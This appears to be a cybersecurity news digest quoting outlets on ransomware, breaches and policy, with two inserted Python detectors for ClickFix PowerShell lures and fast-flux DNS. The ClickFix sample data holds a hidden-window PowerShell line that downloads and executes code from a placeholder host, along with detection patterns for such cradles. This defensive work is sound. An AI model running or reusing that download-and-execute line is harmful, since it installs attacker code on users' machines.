    • “After the regulator’s repeated denials about suffering a data breach, the notorious Rhysida ransomware group took credit for the attack on Monday, claiming to have stolen 2.5 Tb of files, including employee data.” 
  • Bleeping Computer points out,
    • “The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices.
    • “ClickFix is a social engineering tactic where victims are tricked into executing dangerous PowerShell commands on their systems to supposedly fix an error or verify themselves, resulting in the installation of malware.
    • “Though this isn’t the first time ClickFix has been linked to ransomware infections, confirmation about Interlock shows an increasing trend in these types of threat actors utilizing the tactic.
    • “Interlock is a ransomware operation launched in late September 2024, targeting FreeBSD servers and Windows systems.
    • “Interlock is not believed to operate as a ransomware-as-a-service model. Still, it maintains a data leak portal on the dark web to increase pressure on victims, demanding payments ranging from hundreds of thousands of dollars to millions.”
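Detection logic for the ClickFix pattern described above, as an added example that is not from Bleeping Computer or the Interlock research: a hypothetical Python detector that scans constructed process-creation events for PowerShell launched from an interactive shell (where a pasted "fix" command would run) with the download-and-execute traits such lures rely on. The key=value log format, the pattern list and the sample events are all assumptions.

```python
"""Hypothetical ClickFix-style PowerShell detector over constructed process-creation events."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent: str        # parent process image name
    image: str         # created process image name
    user: str          # account that launched it
    command_line: str  # full command line


# Parents that mean a person typed or pasted the command: the Win+R Run dialog is
# hosted by explorer.exe, and a console the user opened themselves is cmd.exe.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}

# Command-line traits common to copy-paste "fix this error" lures. Any one alone
# can be legitimate; paired with an interactive parent they are worth an alert.
SUSPICIOUS_PATTERNS = {
    "download_cradle": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(p|xecutionpolicy)\s+bypass\b", re.I),
}

# Assumed log format: space-separated key=value pairs, values may be double-quoted.
_FIELD = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line: str):
    """Parse one constructed key=value process-creation line; None if malformed."""
    fields = {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
              for m in _FIELD.finditer(line)}
    try:
        return ProcessEvent(fields["parent"], fields["image"], fields["user"], fields["cmd"])
    except KeyError:
        return None


def classify(ev: ProcessEvent):
    """Return (launched_interactively, [matched pattern names]) for a PowerShell event."""
    if ev.image.lower() not in {"powershell.exe", "pwsh.exe"}:
        return False, []
    interactive = ev.parent.lower() in INTERACTIVE_PARENTS
    reasons = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(ev.command_line)]
    return interactive, reasons


def detect_clickfix(lines):
    """Return (user, reasons) for each event that looks like a pasted ClickFix lure."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        interactive, reasons = classify(ev)
        if interactive and reasons:
            hits.append((ev.user, reasons))
    return hits


# Constructed sample events (not real telemetry). The host name uses the reserved
# .invalid TLD so the sample command line cannot resolve anywhere.
SAMPLE_EVENTS = [
    # Scheduled maintenance script: PowerShell, but a service parent and no cradle.
    'parent=svchost.exe image=powershell.exe user=NT_AUTHORITY\\SYSTEM cmd="powershell.exe -File C:\\Scripts\\backup.ps1"',
    # User opened a console by hand: interactive parent, nothing suspicious.
    'parent=explorer.exe image=powershell.exe user=CORP\\asmith cmd="powershell.exe"',
    # Pasted lure from a fake "verify you are human" page: hidden window, policy bypass, cradle.
    'parent=explorer.exe image=powershell.exe user=CORP\\jdoe cmd="powershell -w hidden -ep bypass -c iwr http://update.example.invalid/fix.txt | iex"',
    # Unrelated process from the same user.
    'parent=explorer.exe image=notepad.exe user=CORP\\jdoe cmd="notepad.exe todo.txt"',
]

if __name__ == "__main__":
    for user, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"ALERT {user}: {', '.join(reasons)}")
```

Only the pasted lure is flagged; the service-launched script and the hand-opened console are left alone, which is the trade-off between catching the Run-dialog pattern and not alerting on every PowerShell start.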
  • The Register adds,
    • “Ransomware operators jack up their ransom demands by a factor of 2.8x if they detect a victim has cyber-insurance, a study highlighted by the Netherlands government has confirmed.
    • “For his PhD thesis [PDF], defended in January, Dutch cop Tom Meurs looked at 453 ransomware attacks between 2019 and 2021. He found one of the first actions intruders take is to search for documents with the keywords “insurance” and “policy.” If the crooks find evidence that the target has a relevant policy, the ransom more than doubles on average.
    • “In double-extortion attacks, where intruders threaten to publish data stolen from the victim unless the ransom is paid, those with insurance on average are quoted 5.5x more than those who don’t.” * * *
    • “According to the research, firms with a proper backup system were 27x less likely to pay criminals off, for the simple reason that they usually don’t need to. Even then, surprisingly, some do.
    • “In roughly 5 out of 100 cases in which a payment is made, victims do have the option to recover in a way other than paying, but they still choose to pay – for example to recover faster or to prevent reputational damage,” he said.
    • “In the remaining 95 cases, there is no other option to recover. In those cases, their entire IT infrastructure is broken and can no longer be repaired, making paying the ransom the only option to avoid bankruptcy.”

From the cybersecurity defenses front,

  • The American Hospital Association News tells us,
    • “The Cybersecurity and Infrastructure Security Agency April 17 released guidance to reduce risks associated with a reported breach of Oracle cloud services. CISA said the scope and impact of the breach is unconfirmed and that credentials may be exposed that could be reused across unaffiliated systems or embedded. The guidance lists recommendations for organizations and individual users to mitigate the risk of potential compromise. 
    • “This alert not only contains practical guidance to mitigate the potential breach related to Oracle but also provides valuable guidance and best practices for general cloud security,” said John Riggi, AHA national advisor for cybersecurity and risk. “Generally speaking, we continue to see that most of the cyber risk exposure that hospitals and health systems face originates from insecure third-party technologies, service providers and the supply chain. It is vitally important for mission-critical third parties to share timely threat intelligence and adversary tactics with the federal government and affected clients. This is necessary to prevent potential cyberattacks, which could compromise sensitive data and risk patient safety.” 
  • Dark Reading asks “Are We Prioritizing the Wrong Security Metrics? True security isn’t about meeting deadlines — it’s about mitigating risk in a way that aligns with business objectives while protecting against real-world threats.”
  • Cyberscoop considers whether “Ivanti is the problem or a symptom of a systemic issue with network devices? Exploited vulnerabilities have turned up in Ivanti products 16 times since 2024. That’s more than any other vendor in the network edge device space.”
  • Bleeping Computer suggests “7 Steps to Take After a Credential-Based cyberattack.”
    • “When credentials fall into the wrong hands and hackers breach your systems, every minute counts — but having a well-rehearsed incident response plan will allow you to minimize damage and recovery time.”
  • Here is a link to Dark Reading’s CISO corner.

Cybersecurity Dive

From the cybersecurity policy and law enforcement front,

  • Federal News Network tells us,
    • “The second Trump administration’s cybersecurity policy is still coming into view, but GOP lawmakers are calling for the White House to kick off a review of existing and future cyber regulations.
    • “Lawmakers and policy experts are particularly focused on three key rules: the Cybersecurity and Infrastructure Security Agency’s incident reporting requirements; the Department of Health and Human Services’ proposed update to health care security requirements; and the Securities and Exchange Commission’s 2023 cybersecurity risk management requirements.”
  • FEHBlog note — As early as April 21, federal agencies will be announcing the withdrawal of certain proposed rules, such as the HIPAA Security Rule amendments, which stripped the rule of its most important feature — flexibility, and the repeal of certain final rules under a February 19, 2025, executive order which a Presidential memorandum supplemented last Wednesday.
  • The American Hospital Association News explained on April 10,
    • The Trump administration yesterday released executive orders on reducing anti-competitive regulatory barriers and repealing certain regulations deemed unlawful.  
    • The order on reducing anti-competitive barriers directs federal agencies to review all regulations subject to their rulemaking authority and identify those that create de facto or de jure monopolies, create barriers to entry for new market participants, create or facilitate licensure or accreditation requirements that unduly limit competition, or otherwise impose anti-competitive restraints or distortions in the market.   
    • The order on repealing unlawful regulations is linked to a Feb. [19] executive order [published in the Federal Register on Feb. 25] that directed agencies within 60 days to identify unlawful and potentially unlawful regulations to be repealed. The new order instructs agencies to take steps to immediately repeal regulations and provide justification within 30 days for any identified as unlawful but that have not been targeted for repeal, explaining the basis for the decision not to repeal.
  • The Mintz law firm points out that on April 7, 2025, OMB issued new guidance for the Federal Government’s use of artificial intelligence (AI), and President Trump signed an EO for AI Data Centers.
  • Security Week reports,
    • The National Institute of Standards and Technology (NIST) has announced that all CVEs published before January 1, 2018, will be marked as ‘Deferred’ in the National Vulnerability Database (NVD).
    • This means that, because the CVEs are old, NIST will no longer prioritize updating NVD enrichment or initial NVD enrichment data for them, unless they are or have been included in CISA’s Known Exploited Vulnerabilities (KEV) catalog.
    • “CVEs marked as Deferred will display a banner on their CVE Detail Pages indicating this status. This change will take place over the span of several nights. We are doing this to provide additional clarity regarding which CVE records are prioritized,” NIST announced.
    • “We will continue to accept and review requests to update the metadata provided for these CVE records. Should any new information clearly indicate that an update to the enrichment data for the CVE is appropriate, we will continue to prioritize those requests as time and resources allow,” NIST said.
  • Per an April 10, 2025, HHS press release,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Northeast Radiology, P.C. (NERAD), a professional corporation that provides clinical services at medical imaging centers in New York and Connecticut, concerning potential violations of the Health Insurance Portability and Accountability Act (HIPAA) Security Rule.” * * *
    • “OCR initiated its investigation of NERAD after receiving a breach report from NERAD in March 2020 about a breach of unsecured ePHI. NERAD reported that between April 2019 and January 2020, unauthorized individuals had accessed radiology images stored on NERAD’s PACS server. NERAD notified the 298,532 patients whose information was potentially accessible on the PACS server of this breach. OCR’s investigation found that NERAD had failed to conduct an accurate and thorough risk analysis to determine the potential risks and vulnerabilities to the ePHI in NERAD’s information systems.
    • “Under the terms of the resolution agreement, NERAD agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $350,000 to OCR.” * * *
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/sites/default/files/ocr-hipaa-settlement-nerad.pdf [PDF, 369 KB].”

From the cybersecurity breaches and vulnerabilities front,

  • The Wall Street Journal reports,
    • “Chinese officials acknowledged in a secret December [2024] meeting that Beijing was behind a widespread series of alarming cyberattacks on U.S. infrastructure, according to people familiar with the matter, underscoring how hostilities between the two superpowers are continuing to escalate.
    • “The Chinese delegation linked years of intrusions into computer networks at U.S. ports, water utilities, airports and other targets, to increasing U.S. policy support for Taiwan, the people, who declined to be named, said.  
    • “The first-of-its-kind signal at a Geneva summit with the outgoing Biden administration startled American officials used to hearing their Chinese counterparts blame the campaign, which security researchers have dubbed Volt Typhoon, on a criminal outfit, or accuse the U.S. of having an overactive imagination.” * * *
    • “A Chinese official would likely only acknowledge the intrusions even in a private setting if instructed to do so by the top levels of Xi’s government, said Dakota Cary, a China expert at the cybersecurity firm SentinelOne. The tacit admission is significant, he said, because it may reflect a view in Beijing that the likeliest military conflict with the U.S. would be over Taiwan and that a more direct signal about the stakes of involvement needed to be sent to the Trump administration.
    • “China wants U.S. officials to know that, yes, they do have this capability, and they are willing to use it,” Cary said.”
  • Per Bleeping Computer,
    • “Laboratory Services Cooperative (LSC) has released a statement informing it suffered a data breach where hackers stole sensitive information of roughly 1.6 million people from its systems.
    • “LSC is a Seattle-based nonprofit organization that provides centralized laboratory services to its member affiliates, including select Planned Parenthood centers.
    • “It plays a crucial role within its niche, supporting organizations in the reproductive health services across more than 35 U.S. states, handling sensitive lab testing, billing, and personal data.”
  • and
    • “Oracle finally confirmed in email notifications sent to customers that a hacker stole and leaked credentials that were stolen from what it described as “two obsolete servers.”
    • “However, the company added that its Oracle Cloud servers were not compromised, and this incident did not impact customer data and cloud services.
    • “Oracle would like to state unequivocally that the Oracle Cloud—also known as Oracle Cloud Infrastructure or OCI—has NOT experienced a security breach,” Oracle says in a customer notification shared with Bleeping Computer.”
  • and
    • “Phishing-as-a-service (PhaaS) platform Tycoon2FA, known for bypassing multi-factor authentication on Microsoft 365 and Gmail accounts, has received updates that improve its stealth and evasion capabilities.
    • “Tycoon2FA was discovered in October 2023 by Sekoia researchers, who later reported significant updates on the phishing kit that increased its sophistication and effectiveness.
    • “Trustwave now reports that the Tycoon 2FA threat actors have added several improvements that bolster the kit’s ability to bypass detection and endpoint security protections.”
  • The Cybersecurity and Infrastructure Security Agency added five known exploited vulnerabilities to its catalog this week.
  • CISA announced yesterday,
    • Fortinet is aware of a threat actor creating a malicious file from previously exploited Fortinet vulnerabilities (CVE-2024-21762, CVE-2023-27997, and CVE-2022-42475) within FortiGate products. This malicious file could enable read-only access to files on the device’s file system, which may include configurations. Fortinet has communicated directly with the account holders of customers identified as impacted by this issue based on the available telemetry with mitigation guidance.
    • See the following resource for more information: Analysis of Threat Actor Activity | Fortinet Blog

From the ransomware front,

  • Morphisec discusses the most notable ransomware attacks from the last six months.
  • Cybersecurity Dive informs us,
    • “Remote access tools were the initial entry point in eight of every 10 ransomware attacks in 2024, according to a report released Thursday by At-Bay. VPNs accounted for about two-thirds of ransomware attack entry points. 
    • “Indirect ransomware claims continue to rise, showing a 43% increase in 2024, according to At-Bay. Indirect ransomware is when an attack begins on a third-party vendor or business partner, often leading to a data breach or business interruption of a downstream client or partner. The report cites the 2023 MOVEit breaches and the 2024 CDK attacks.
    • “Overall, the frequency of ransomware claims returned to record levels seen in 2021 after a decreased rate of attacks in 2022 and 2023, according to At-Bay.” 
  • and
    • “Sensata Technologies was struck by a ransomware attack earlier this week that disrupted several of the company’s operations, according to a regulatory filing.
    • “Sensata disclosed that a ransomware attack on Sunday encrypted certain devices on the network. The Attleboro, Mass.-based company specializes in sensors, controls and other industrial technology for the automotive, aerospace and manufacturing sectors.
    • “The incident has temporarily impacted Sensata’s operations, including shipping, receiving, manufacturing production, and various other support functions. While the company has implemented interim measures to allow for the restoration of certain functions, the timeline for a full restoration is not yet known,” Sensata said in the SEC filing.”
  • Dark Reading lets us know,
    • “While ransomware represented the costliest cyber-insurance claims in 2024, incidents of financial fraud continue to be far more numerous, with both often triggered by security failures at a third-party firm.
    • “That insight comes from the latest tranche of cyber-insurance data released this year, this time by cyber-insurance firm At-Bay. Financial fraud — most often following a phishing attack — remained the most common type of cyberattack leading to an insurance claim, according to At-Bay’s “2025 InsurSec Report,” released this week. While the cyber insurer saw 16% more claims in 2024 than the year before, the overall cost of each incident declined to $166,000, down from $213,000 in 2021.”
  • Microsoft Security explains how cyber attackers exploit domain controllers using ransomware.
  • CSO in a commentary article notes,
    • “If you didn’t pay much attention to news of the recent Codefinger ransomware attack, it’s probably because ransomware has become so prevalent that major incidents no longer feel notable.
    • “But Codefinger is not just another ransomware breach to add to the list of incidents where businesses lost sensitive data to attackers. In key respects, Codefinger represents a substantially new type of ransomware attack.
    • “By extension, the incident is a reminder of why conventional cybersecurity techniques won’t always protect businesses and their data — and why organizations need to think beyond the basics regarding defending against ransomware.”
  • Tech Target discusses best practices on reporting ransomware attacks.

From the cybersecurity defenses front,

  • Security Week notes,
    • “As the threat landscape grows more sophisticated, Chief Information Security Officers (CISOs) are continuously searching for innovative ways to safeguard their organizations. Yet one of the most potent tools in their arsenal remains underutilized – DNS (domain name systems).”
  • An ISACA blog entry discusses how to build AI governance by design.
  • Per Bleeping Computer,
    • “Microsoft is testing a new Defender for Endpoint capability that will block traffic to and from undiscovered endpoints to thwart attackers’ lateral network movement attempts.
    • “As the company revealed earlier this week, this is achieved by containing the IP addresses of devices that have yet to be discovered or onboarded to Defender for Endpoint.
    • “Redmond says the new feature will prevent threat actors from spreading to other non-compromised devices by blocking incoming and outgoing communication with devices using contained IP addresses.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy front,

  • Nextgov/FCW reports,
    • “Rep. Eric Swalwell, the House Homeland Security Committee’s leading Democratic voice on cybersecurity matters, suggested Wednesday that government contractors could be deployed to conduct offensive cybersecurity operations against foreign adversaries.
    • “Speaking at an Axonius event in Washington, D.C., the California congressman said the concept is worth exploring, in part, because “the federal government does not have the resources to protect every company that gets hit,” and that the moves could deter adversaries like Russia from targeting low-resourced critical infrastructure sectors.
    • “The remarks make Swalwell one of the first Democrats to publicly suggest that the private sector take a broader role in hacking back against foreign rivals. The dynamic has been floated in recent months largely by Republicans as a way to respond to headline-making Chinese intelligence intrusions into U.S. telecom systems and other infrastructure.”
  • Per a news release,
    • “Incident response is a critical part of cybersecurity risk management and should be integrated across organizational operations. The six Functions of the NIST Cybersecurity Framework (CSF) 2.0 all play vital roles in incident response.
    • “NIST has finalized Special Publication (SP) 800-61r3 (Revision 3), Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile, which describes how to incorporate incident response recommendations into cybersecurity risk management activities in alignment with CSF 2.0. This guidance will help organizations reduce the number and impact of incidents that occur and improve the efficiency and effectiveness of their incident detection, response, and recovery activities.
    • “SP 800-61r3 supersedes SP 800-61r2 (Revision 2), Computer Security Incident Handling Guide.
    • “Readers of SP 800-61r3 are encouraged to utilize the resources on NIST’s Incident Response project page in conjunction with this document to implement these recommendations and considerations.” 
  • The American Hospital Association News tells us,
    • “The House Energy and Commerce Oversight and Investigations Subcommittee April 1 discussed cybersecurity threats in legacy medical devices during a hearing. The subcommittee heard from experts on the dangers of outdated devices as the hardware can last several years longer than software.”

From the cyber vulnerabilities and breaches front,

  • The Cybersecurity and Infrastructure Security Agency added three known exploited vulnerabilities to its catalog this week.
  • Cybersecurity Dive reports on April 2,
    • A recent surge in login attempts targeting Palo Alto Networks’ PAN-OS GlobalProtect portals mainly located in the U.S. could be a precursor to a large-scale exploitation of unpatched or zero-day vulnerabilities, researchers have found. 
    • The threat activity means defenders with exposed Palo Alto Networks VPN systems should review March 2025 logs and consider engaging in detailed threat hunting to detect signs of compromise.
    • Over the last 30 days, nearly 24,000 unique IP addresses have attempted to access these portals, activity that suggests a coordinated effort to identify exposed or vulnerable systems for targeted abuse of flaws, according to a report released this week from security intelligence firm GreyNoise.
  • HelpNet Security points out “Attackers are targeting CrushFTP vulnerability with public PoC (CVE-2025-2825).”
    • “Exploitation attempts targeting the CVE-2025-2825 vulnerability on internet-facing CrushFTP instances are happening, the Shadowserver Foundation has shared on Monday, and the attackers have been leveraging publicly available PoC exploit code.”

From the ransomware front,

  • The Wall Street Journal reports,
    • “The Federal Trade Commission in March identified impostor scams—in which someone impersonates a loved one, colleague or government official—as the most-reported type last year, resulting in losses of nearly $3 billion. 
    • “Criminals increasingly use generative AI to mimic a loved one’s voice, making these kinds of scams more believable, the Federal Bureau of Investigation has warned. It takes just three seconds of audio to clone a voice with 85% accuracy, according to the security-software firm McAfee, whose survey of 7,000 people globally found that more than half regularly share voice content online.
    • “Criminals can also use AI to approximate the voice of someone of any age, gender or dialect. During a high-stress situation, a generic voice of a young woman could be confused for the voice of a daughter, according to cybersecurity experts.”
  • Per Cybersecurity Dive,
    • “The FBI, the Cybersecurity and Infrastructure Security Agency and a group of international partners on Thursday [April 3] warned that cyber threat groups are using a technique called “fast flux” to hide the locations of malicious servers, posing a significant threat to national security.
    • “Authorities warned that both criminal and state-linked threat groups have used fast flux to obfuscate the locations of these servers using fast-changing Domain Name System records. They also can create highly resilient command and control (C2) infrastructure to conceal their malicious operations, particularly in connection with botnets.
    • “Fast flux techniques are not only used for C2 communications but also in phishing campaigns to protect social engineering websites from being blocked or taken down, authorities said.” 
    • “Authorities did not specify whether there is an active campaign using fast flux or directly name any threat actor currently using the technique. However, they did reference past activity, noting that fast flux has been used in previous ransomware attacks linked to Hive and Nefilim. Additionally, a Russia-backed threat actor known as Gamaredon has also used fast flux to mask threat activities, according to the advisory.”
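An added illustration of the churn pattern the advisory describes (not code from Cybersecurity Dive, the advisory, or its authors): a small Python scorer over constructed resolver-log lines in an assumed format that flags domains whose answers rotate across many addresses and networks with short TTLs, while leaving a single-network CDN-style name alone. The /16 grouping stands in for an ASN lookup, which an offline example cannot do.

```python
"""Fast flux scoring over DNS resolver logs (added example, not the advisory's code).

Fast flux hides a C2 or phishing host behind DNS records that change every few
minutes.  A defender cannot see the rotation from one lookup, but a resolver
log shows it: one name, many distinct addresses, spread across unrelated
networks, each answer carrying a short TTL.  This scorer looks for that shape.
"""
from __future__ import annotations

import re
import statistics
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import IPv4Network

# Constructed sample lines in an assumed log format (not a real product's):
#   "<epoch> <qname> A <ipv4> ttl=<seconds>"
# All addresses are from RFC 5737 documentation ranges.
SAMPLE_LOG = """\
1700000000 flux-lure.example A 203.0.113.10 ttl=60
1700000090 flux-lure.example A 198.51.100.77 ttl=60
1700000180 flux-lure.example A 192.0.2.45 ttl=120
1700000300 flux-lure.example A 203.0.113.200 ttl=60
1700000420 flux-lure.example A 198.51.100.8 ttl=60
1700000540 flux-lure.example A 192.0.2.99 ttl=60
1700000000 intranet.example A 192.0.2.5 ttl=3600
1700001800 intranet.example A 192.0.2.5 ttl=3600
1700000000 cdn-assets.example A 203.0.113.21 ttl=300
1700000300 cdn-assets.example A 203.0.113.22 ttl=300
1700000600 cdn-assets.example A 203.0.113.23 ttl=300
1700000900 cdn-assets.example A 203.0.113.24 ttl=300
1700001200 cdn-assets.example A 203.0.113.25 ttl=300
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<qname>\S+)\s+A\s+(?P<ip>[\d.]+)\s+ttl=(?P<ttl>\d+)$"
)


@dataclass(frozen=True)
class Answer:
    ts: int
    qname: str
    ip: str
    ttl: int


def parse_log(text: str) -> list[Answer]:
    """Parse the assumed log format; malformed lines are skipped, not fatal."""
    answers: list[Answer] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        qname = m["qname"].lower().rstrip(".")  # normalise case and trailing dot
        answers.append(Answer(int(m["ts"]), qname, m["ip"], int(m["ttl"])))
    return answers


@dataclass
class FluxStats:
    qname: str
    distinct_ips: int      # how many different A records were seen
    distinct_nets: int     # how many different /16s those records fall in
    median_ttl: float      # short TTLs force clients to re-resolve often
    span_seconds: int      # time covered by the answers that were scored


def summarise(answers: list[Answer], window_seconds: int = 3600) -> list[FluxStats]:
    """Per-name statistics over the answers in the most recent window."""
    by_name: dict[str, list[Answer]] = defaultdict(list)
    for a in answers:
        by_name[a.qname].append(a)
    stats = []
    for qname, rows in by_name.items():
        rows.sort(key=lambda r: r.ts)
        newest = rows[-1].ts
        recent = [r for r in rows if newest - r.ts <= window_seconds]
        ips = {r.ip for r in recent}
        # /16 is a crude stand-in for "different network"; swap in an ASN
        # lookup where one is available.
        nets = {str(IPv4Network(f"{r.ip}/16", strict=False)) for r in recent}
        stats.append(FluxStats(
            qname=qname,
            distinct_ips=len(ips),
            distinct_nets=len(nets),
            median_ttl=statistics.median([r.ttl for r in recent]),
            span_seconds=recent[-1].ts - recent[0].ts,
        ))
    return stats


def is_fast_flux(s: FluxStats, min_ips: int = 5, min_nets: int = 3, max_ttl: int = 300) -> bool:
    """All three signals must agree: many addresses, many networks, short TTLs.

    Requiring network diversity is what keeps a CDN (many addresses, one
    network) from being flagged; thresholds are assumptions to tune locally.
    """
    return s.distinct_ips >= min_ips and s.distinct_nets >= min_nets and s.median_ttl <= max_ttl


def find_fast_flux(text: str, **thresholds) -> list[str]:
    """Names in the log that match the fast flux shape, sorted for stable output."""
    return sorted(s.qname for s in summarise(parse_log(text)) if is_fast_flux(s, **thresholds))


if __name__ == "__main__":
    for s in summarise(parse_log(SAMPLE_LOG)):
        print(f"{s.qname:22} ips={s.distinct_ips} nets={s.distinct_nets} "
              f"median_ttl={s.median_ttl:.0f}s flagged={is_fast_flux(s)}")
```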
  • Beckers Health IT informs us on March 31,
    • “The FBI is investigating a cyberattack on Oracle’s computer systems in which hackers stole patient data to extort multiple U.S. healthcare providers, Bloomberg reported March 28.
    • “Oracle notified some healthcare customers earlier this month that the breach occurred sometime after Jan. 22. According to a notice sent to clients and obtained by Bloomberg, hackers accessed company servers and copied patient data to an external location.
    • “A person familiar with the matter, who spoke on condition of anonymity, told the publication that cybercriminals attempted to demand ransom from affected medical providers. The total number of targeted providers and stolen patient records remains unknown.
    • “Oracle did not respond to Bloomberg’s request for comment. An FBI spokesperson also declined to comment.”
  • Per Bleeping Computer,
    • “Port of Seattle, the U.S. government agency overseeing Seattle’s seaport and airport, is notifying roughly 90,000 individuals of a data breach after their personal information was stolen in an August 2024 ransomware attack.
    • “The agency disclosed the attack on August 24, saying the resulting IT outage disrupted multiple services and systems, including reservation check-in systems, passenger display boards, the Port of Seattle website, the flySEA app, and delayed flights at Seattle-Tacoma International Airport.
    • “Three weeks after the initial disclosure, the Port confirmed that the Rhysida ransomware operation was behind the August 2024 breach.
    • “After the incident, the Port also decided not to give in to the cybercriminals’ demands to pay for a decryptor even though they threatened to publish stolen data on their dark web leak site.
    • “We have refused to pay the ransom demanded, and as a result, the actor may respond by posting data they claim to have stolen on their darkweb site,” the Port of Seattle said on September 13, 2024.
    • “Our investigation of what data the actor took is ongoing, but it does appear that some Port data was obtained by the actor in mid-to-late August. Assessment of the data taken is complex and takes time.”
  • Fortra discusses HellCat ransomware,
    • “HellCat is the name of a relatively new ransomware-as-a-service (RaaS) group that first came to prominence in the second half of 2024. Like many other ransomware operations, HellCat breaks into organisations, steals sensitive files, and encrypts computer systems – demanding a ransom payment for a decryption key and to prevent the leaking of stolen files.”
  • GTSC brings us up to date on the Medusa ransomware gang.
    • The Medusa ransomware gang is a ransomware-as-a-service (RaaS) operation first identified in June 2021. Since then, it has targeted over 300 victims across various critical infrastructure sectors, including medical, education, legal, insurance, technology, and manufacturing.
  • Per SC Media,
    • “A threat actor using a combination of AI-powered vishing, the more conventional remote access tool Microsoft Quick Assist, and living-off-the-land techniques has demonstrated how a simple vishing attack can escalate into a full compromise.
    • “In an April 1 blog post, researchers from Ontinue reported that the techniques observed in this recent campaign align with those previously attributed to Storm-1811, a threat actor identified by Microsoft known for leveraging vishing, MS Quick Assist, and social engineering via MS Teams to gain network access.
    • “SC Media first reported on this group last May, in which it was reported the group abused Quick Assist to deploy the BlackBasta ransomware.”

From the cybersecurity defenses front,

  • Cyberscoop reports,
    • “Businesses don’t always get what they pay for in cybersecurity. Some of the most expensive cloud network firewall vendors are among the worst performers against exploits and evasions, according to the most comprehensive, independent testing CyberRatings.org has conducted to date.
    • “Cisco, by far the most expensive cloud network firewall offering across the top 10 vendors on price per megabits per second, ranked seventh with an overall security effectiveness score of 53.5%, according to CyberRatings.org research released Wednesday. 
    • “The trio of big cloud providers — Amazon Web Services, Microsoft Azure and Google Cloud Platform — fared even worse, each landing at the bottom of the pack with a 0% security effectiveness score. 
    • “We’ve been told to use cloud-native technologies, that they’re better suited than using bolt-ons. Well, that’s clearly not the case here,” CyberRatings.org CEO Vikram Phatak told CyberScoop.”
  • Dark Reading explains “How an Interdiction Mindset Can Help Win War on Cyberattacks. The US military and law enforcement learned to outthink insurgents. It’s time for cybersecurity to learn to outsmart and outmaneuver threat actors with the same framework.”
  • In email news,
    • Bleeping Computer lets us know “Google rolls out easy end-to-end encryption for Gmail business users.”
    • Dark Reading informs us “Microsoft Boosts Email Sender Rules for Outlook. Beginning on May 5, the tech giant will enforce new email authentication protocols for Outlook users who send large volumes of email.”
  • Per a NIST news release, here are “7 Tips to Keep Your Smart Home Safer and More Private, From a NIST Cybersecurity Researcher.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • The American Hospital Association tells us,
    • “The Trump Administration March 28 announced that it renewed for one year the public emergency for ongoing malicious cyber-enabled activities against the U.S. The national emergency was first issued in April 2015.”
  • Cyberscoop tells us,
    • “Many cyber experts are panning a new Trump administration executive order that would shift more responsibilities for responding to cyberattacks to state and local governments, saying it will leave states holding the bag for a job they aren’t best equipped to handle.
    • “The executive order, issued last week, is entitled “Achieving Efficiency Through State and Local Preparedness.” Its stated purpose is to improve defenses against cyberattacks and other risks, but many expect it will do the opposite.
    • “Federal policy must rightly recognize that preparedness is most effectively owned and managed at the State, local, and even individual levels, supported by a competent, accessible, and efficient Federal Government,” it reads. “Citizens are the immediate beneficiaries of sound local decisions and investments designed to address risks, including cyber attacks, wildfires, hurricanes, and space weather.”
    • “A number of cyber experts said it was a misguided document, sometimes in harsh terms, especially as it pertains to where they believe responsibilities should be assigned.”
  • Indiana University Professor Scott Shackleford, writing in the Wall Street Journal, offers five ideas for federal cybersecurity reform:
    • “The U.S. is spending more than ever on cybersecurity yet cyberattacks continue to proliferate.
    • “According to McKinsey, global losses to cyberattacks could exceed $10.5 trillion this year, a 300% increase from 2015 and an amount larger than the economies of Germany and Japan combined.
    • “I believe a new approach is needed—one in which the federal government plays a more assertive role.
    • “For at least two decades, U.S. cybersecurity policy has been stuck in a pattern of incremental tweaks focused on the same basic ideas—encouraging voluntary industry cooperation, offering information-sharing partnerships and establishing new bureaucratic offices. It isn’t working. We need bold changes, the most important of which is treating cybersecurity as a public good akin to national security and public safety.” 
  • FCW/NextGov informs us,
    • “The General Services Administration launched FedRAMP 20x Monday, an effort it is pursuing with industry to use more automation and cut red tape around the government’s cloud security assessment and authorization program. 
    • “The Federal Risk and Authorization Management Program, or FedRAMP, is used to ensure services offered by cloud providers meet certain cybersecurity requirements before government agencies can use them.
    • “Our partnership with the commercial cloud industry needs serious improvement. Strengthening this relationship will help us fulfill our commitment to cutting waste and adopting the best available technologies to modernize the government’s aging IT infrastructure,” Stephen Ehikian, acting administrator of the General Services Administration, which runs FedRAMP, said in a statement. “FedRAMP 20x will give agencies access to the latest technology now — not months or years down the road.”
  • Security Boulevard summarizes public comments on the proposed HIPAA Security Rule amendments and discusses next steps. The public comment deadline was March 7.
  • Bleeping Computer points out,
    • “The U.S. Department of Justice (DOJ) has seized over $8.2 million worth of USDT (Tether) cryptocurrency that was stolen via ‘romance baiting’ scams.
    • “Previously referred to as ‘pig butchering,’ in this type of financial fraud victims are manipulated into making investments on fraudulent websites/apps that showcase massive returns.”

From the cybersecurity vulnerabilities and breaches front,

  • Security Week lets us know,
